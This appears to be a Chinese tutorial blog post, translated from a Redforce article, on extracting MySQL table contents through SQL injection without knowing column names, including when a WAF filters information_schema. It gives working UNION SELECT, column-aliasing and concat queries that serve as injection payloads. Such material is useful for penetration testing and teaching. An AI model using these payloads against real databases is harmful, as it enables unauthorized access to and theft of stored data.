前言
最近感覺腦子空空,全在為了刷洞去挖洞,還是回歸技術(shù)的本身讓自己舒服些。好了,下面話不多說了,來一起看看詳細的介紹吧
前提
以下情況適用于 MySQL 5版本,或者在 MySQL >= 5 的版本[存在information_schema庫],且已獲取到庫名和表名
① 當只能獲取到表名,獲取不到列名或者只能獲取到無有效內(nèi)容的列名情況【例如 id】
② 當希望通過information_schema庫中的表去獲取其他表的結(jié)構(gòu),即表名、列名等,但是這個庫被WAF過濾掉的情況
其實個人感覺這個方法還是對 5 版本以下的實用性比較強一些,因為對我來說,一般遇到waf就放棄了(菜的真實23333)
解決
正常的查詢:
以下是正常查詢 test 庫中的 user 表內(nèi)容
![](http://img.jbzj.com/file_images/article/201903/2019323100100254.png?20192231018)
UNION查詢:
select 1,2,3,4 union select * from user;
![](http://img.jbzj.com/file_images/article/201903/2019323100139058.png?201922310146)
數(shù)字對應(yīng)列查詢:
可以使用數(shù)字來對應(yīng)列來進行查詢,如 2 對應(yīng)了表里面的 name 列
select `2` from (select 1,2,3,4 union select * from user)a;
![](http://img.jbzj.com/file_images/article/201903/2019323100230932.png?201922310239)
別名代替查詢:
當反引號 ` 不能使用的時候,可以使用別名來代替,如設(shè)置 2 的別名為 b
select b from (select 1,2 as b,3,4 union select * from user)a;
![](http://img.jbzj.com/file_images/article/201903/2019323100312030.png?201922310319)
多列合并查詢:
同上:這里反引號不能用的話,一樣可以使用別名代替
select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1;
![](http://img.jbzj.com/file_images/article/201903/2019323100415662.png?201922310427)
僅作翻譯以及思路整理
原文鏈接:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/
總結(jié)
以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。
您可能感興趣的文章:- MySQL 及 SQL 注入與防范方法
- SQL Injection with MySQL 注入分析
- Mysql數(shù)據(jù)庫使用concat函數(shù)執(zhí)行SQL注入查詢
- mysql5 注入漏洞
- 防止MySQL注入或HTML表單濫用的PHP程序
- MySQL注入繞開過濾的技巧總結(jié)
- Mysql注入中的outfile、dumpfile、load_file函數(shù)詳解
- MYSQL updatexml()函數(shù)報錯注入解析
- node-mysql中防止SQL注入的方法總結(jié)
- PHP MYSQL注入攻擊需要預防7個要點